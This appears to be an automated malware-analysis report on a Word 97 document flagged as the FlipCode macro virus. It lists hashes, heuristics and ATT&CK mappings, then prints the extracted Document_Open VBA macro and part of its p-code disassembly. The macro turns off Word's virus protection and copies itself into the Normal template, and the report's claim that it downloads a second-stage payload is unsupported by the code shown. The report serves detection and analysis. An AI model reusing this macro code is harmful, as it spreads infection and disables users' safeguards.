Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5cae36647399283f…

MALICIOUS

Office (OLE)

Size: 43.0 KB
Created: 1999-05-04 18:57:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ccf0c7d7dd1c4167b51afadff473cdd0
SHA-1: 99b193c89e6a14dac333497f500398e95bcd52cc
SHA-256: 5cae36647399283fbadf044991010d91e5951758d2ce040dba643034cc964913
Risk Score: 160

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code. The macro is heavily obfuscated, making its exact function difficult to determine, but it appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.FlipCode-1' further supports its malicious nature.

Heuristics (4)

  • ClamAV: Doc.Trojan.FlipCode-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.FlipCode-1
  • OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]
    OLE file is 44,032 bytes but its declared streams total only 24,410 bytes; 19,622 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5381 bytes
SHA-256: 71478e211719e5a4aab09777130a6c2642303927076fa7b86f6cd88a8b1b0401

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open() ' buS dnE :lacitirCbv ,".yltcerroc ti llatsni ot putes nur esaelP .dezilaitini eb ton dluoc tnemnorivne cisaB lausiV ehT" xoBgsM :)(edocbvweiv buS etavirP
Application.ShowVisualBasicEditor = False ' buS dnE
On Error GoTo yalav ' emaNlluF.tnemucoDevitcA=:emaNeliF sAevaS.tnemucoDevitcA nehT "tnemucoD" >< )8 ,emaN.tnemucoDevitcA(tfeL fI
Options.VirusProtection = 0 ' gal txeN
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ' $van ,1 seniLtresnI.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA
For lav = 1 To 14 ' tanya txeN
ehs$ = "" ' )1 ,tanya ,))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(($diM & $van = $van
For ruam = 1 To Len(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(lav, 1)) ' 1- petS 1 oT ))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(neL = tanya roF
ehs$ = Mid$((ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.lines(lav, 1)), ruam, 1) & ehs$ ' "" = $van
Next ruam ' 41 oT 1 = gal roF
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, ehs$ ' seniLfOtnuoC.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA ,1 seniLeteleD.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA nehT 0 > seniLfOtnuoC.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA fI
Next lav ' eslaF = noitcetorPsuriV.snoitpO
'9991 eam 0.1v edocpilf' txeN emuseR rorrE nO
yalav: End Sub ' )(esolc_tnemucod buS etavirP

' Processing file: /opt/analyzer/scan_staging/37bd169a494e48c9adc8d8aad4b3deba.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8932 bytes
' Line #0:
' 	FuncDefn (Private Sub document_open())
' 	QuoteRem 0x001C 0x0099 " buS dnE :lacitirCbv ,".yltcerroc ti llatsni ot putes nur esaelP .dezilaitini eb ton dluoc tnemnorivne cisaB lausiV ehT" xoBgsM :)(edocbvweiv buS etavirP"
' Line #1:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ShowVisualBasicEditor 
' 	QuoteRem 0x0029 0x0008 " buS dnE"
' Line #2:
' 	OnError yalav 
' 	QuoteRem 0x0014 0x006B " emaNlluF.tnemucoDevitcA=:emaNeliF sAevaS.tnemucoDevitcA nehT "tnemucoD" >< )8 ,emaN.tnemucoDevitcA(tfeL fI"
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x001C 0x0009 " gal txeN"
' Line #4:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' 	EndIf 
' 	QuoteRem 0x00E0 0x004D " $van ,1 seniLtresnI.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.tnemucoDevitcA"
' Line #5:
' 	StartForVariable 
' 	Ld lav 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x000E 
' 	For 
' 	QuoteRem 0x0012 0x000B " tanya txeN"
' Line #6:
' 	LitStr 0x0000 ""
' 	St ehs$ 
' 	QuoteRem 0x000A 0x0067 " )1 ,tanya ,))1 ,gal(senil.eludoMedoC.)1(metI.stnenopmoCBV.tcejorPBV.etalpmeTlamroN(($diM & $van = $van"
' Line #7:
' 	StartForVariable 
' 	Ld ruam 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld lav 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	FnLen 
' 	For 
' 	QuoteRem 0x005C 0x0065 " 1- petS 1 oT ))1 ,gal(senil.eludoMedoC.)1(metI.stneno
... (truncated)